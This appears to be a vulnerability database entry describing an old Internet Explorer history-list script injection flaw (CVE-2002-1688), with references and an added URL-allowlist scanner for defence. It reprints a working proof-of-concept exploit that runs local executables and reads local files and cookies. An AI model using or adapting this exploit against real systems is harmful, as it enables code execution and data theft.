Microsoft Internet Explorer History List Script Insertion Vulnerability

Vulnerability ID 1106677 Vulnerability type Design error
Published 2002-04-15 Updated 2005-10-20
CVE ID CVE-2002-1688
CNNVD ID CNNVD-200212-760
Platform Windows CVSS score 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/21376
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-760
|Vulnerability details
Microsoft Internet Explorer is a popular web browser developed and maintained by Microsoft. Internet Explorer has a flaw in its handling of the history list that allows a remote attacker to insert arbitrary script code into the history list and have it executed. Internet Explorer stores javascript: URLs in the browser history list, and script code contained in a javascript: URL runs in the security-zone context of the last viewed page; this behaviour is meant to protect against attacks using javascript: URLs embedded in a maliciously constructed web page. However, an attacker can arrange for the javascript: URL to be triggered when the user presses the 'Back' button, which causes the script code in the javascript: URL to execute in the context of a different page. When the page fails to load after 'Back' is pressed, IE's normal behaviour is to display an error page that runs in the Local Machine security zone (on Windows 2000 this is res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#), so the script code in the javascript: URL can execute in the Local Machine zone context, or read the contents of arbitrary local files.
|Vulnerability exploit (PoC)
source: http://www.securityfocus.com/bid/4505/info

A vulnerability has been reported in some versions of Internet Explorer. It is possible to inject JavaScript code into the browser history list, and execute it within any page context given appropriate user interaction.

Internet Explorer stores javascript: URLs in the browser history list. Script executed within the javascript: URL will inherit the security zone of the last viewed page. This provides protection against javascript: URLs included within a maliciously constructed web page. However, a user may navigate to a javascript: URL using the 'Back' button in their browser. This may result in the injected script code executing within the context of another page.

This behavior has been reported in versions 6.0 and 5.5 of IE. Other versions of Internet Explorer may share this vulnerability. This has not, however, been confirmed. 

<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')">
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.com/')">
Read Google cookie</a>

<script>
// A URL that fails to load, so that 'Back' lands on IE's local-zone error page.
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
// Payload: an <object> whose CODEBASE points at a local executable.
function execFile(file){
  s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
  s+= 'CODEBASE='+file+'></OBJECT>';
  backBug(badUrl,s);
}
// Payload: a hidden iframe that loads a local file and alerts its text.
function readFile(file){
  s = '<iframe name=i src='+file+' style=display:none onload=';
  s+= 'alert(i.document.body.innerText)></iframe>';
  backBug(badUrl,s);
}
// Payload: a script that alerts the cookie of the site given as url.
// The closing tag is split so it does not terminate this <script> block.
function readCookie(url){
  s = '<script>alert(document.cookie);close();<'+'/script>';
  backBug(url,s);
}
// Builds a javascript: URL and navigates to it. On first evaluation
// (history.length equals the recorded value) it returns markup that
// navigates to url and records this page's title; when re-evaluated via
// 'Back' from the resulting page (history.length differs) it writes the
// payload into a new window and steps back again.
function backBug(url,payload){
  len = history.length;
  page = document.location;
  s = "javascript:if (history.length!="+len+") {";
  s+= "open('javascript:document.write(\""+payload+"\")')";
  s+= ";history.back();} else '<script>location=\""+url;
  s+= "\";document.title=\""+page+"\";<"+"/script>';";
  location = s;
}
</script>
</html>
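The advisory and PoC above both hinge on javascript: URLs being accepted as link targets and later replayed from history. The defensive counterpart is to refuse any link whose scheme is not on an allowlist before it reaches a page or a user. The following is an added example written for this entry, not code from the advisory, SecurityFocus or Microsoft: a scheme check that normalizes a URL the way lenient browsers do (ignoring embedded control characters and case) and a small scanner that applies it to anchor hrefs in an HTML string. The allowlist, the function names and the sample HTML are assumptions made for the example.

```javascript
// Added example (not part of the original advisory or PoC): a URL scheme
// allowlist plus a scanner that flags anchor hrefs failing it. Names and the
// allowlist below are assumptions chosen for this illustration.

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Extract the scheme of a URL after normalizing it the way a lenient browser
// does: drop ASCII control characters (browsers ignore a tab or newline inside
// "java\tscript:"), trim surrounding whitespace, and lower-case the result.
// Returns null when the URL has no scheme (i.e. it is relative).
function extractScheme(rawUrl) {
  const cleaned = String(rawUrl)
    .replace(/[\u0000-\u001F\u007F]/g, "")
    .trim();
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// A link target is accepted only if it is relative or its scheme is allowlisted.
// Denylisting "javascript:" alone would miss vbscript:, data: and future schemes.
function isSafeHref(rawUrl) {
  const scheme = extractScheme(rawUrl);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Scan an HTML string for <a href=...> attributes and return those that fail
// the allowlist, with the scheme that was detected. The regex extraction is
// deliberately simple; a production check would walk a parsed DOM instead.
function findUnsafeHrefs(html) {
  const findings = [];
  const re = /<a\b[^>]*\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const href = m[1] ?? m[2] ?? m[3];
    if (!isSafeHref(href)) {
      findings.push({ href, scheme: extractScheme(href) });
    }
  }
  return findings;
}

// Constructed sample input: benign links mixed with javascript:-style links
// (the shape used by the PoC above), an obfuscated scheme, and other
// non-allowlisted schemes. The "\t" inside the obfuscated link is a real tab.
const SAMPLE_HTML = `
<a href="https://example.test/page">ok</a>
<a href="/relative/path">ok</a>
<a href="javascript:doSomething()">bad</a>
<a href=" JaVa\tScRiPt:doSomething()">bad, obfuscated scheme</a>
<a href='vbscript:DoSomething'>bad</a>
<a href="data:text/html,<b>x</b>">bad</a>
<a href="mailto:user@example.test">ok</a>
`;

// Stand-alone run: prints the four flagged links with their schemes.
console.log(findUnsafeHrefs(SAMPLE_HTML));
```

The check is written as an allowlist rather than a search for the string "javascript:" because the normalization step is where most bypasses live: mixed case, leading whitespace and embedded tab or newline characters are all tolerated by browsers when resolving a scheme, so the filter must strip them before comparing.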
|References

Source: XF
Name: ie-history-javascript-urls(8844)
Link: http://xforce.iss.net/xforce/xfdb/8844
Source: BID
Name: 4505
Link: http://www.securityfocus.com/bid/4505
Source: NSFOCUS
Name: 2606
Link: http://www.nsfocus.net/vulndb/2606
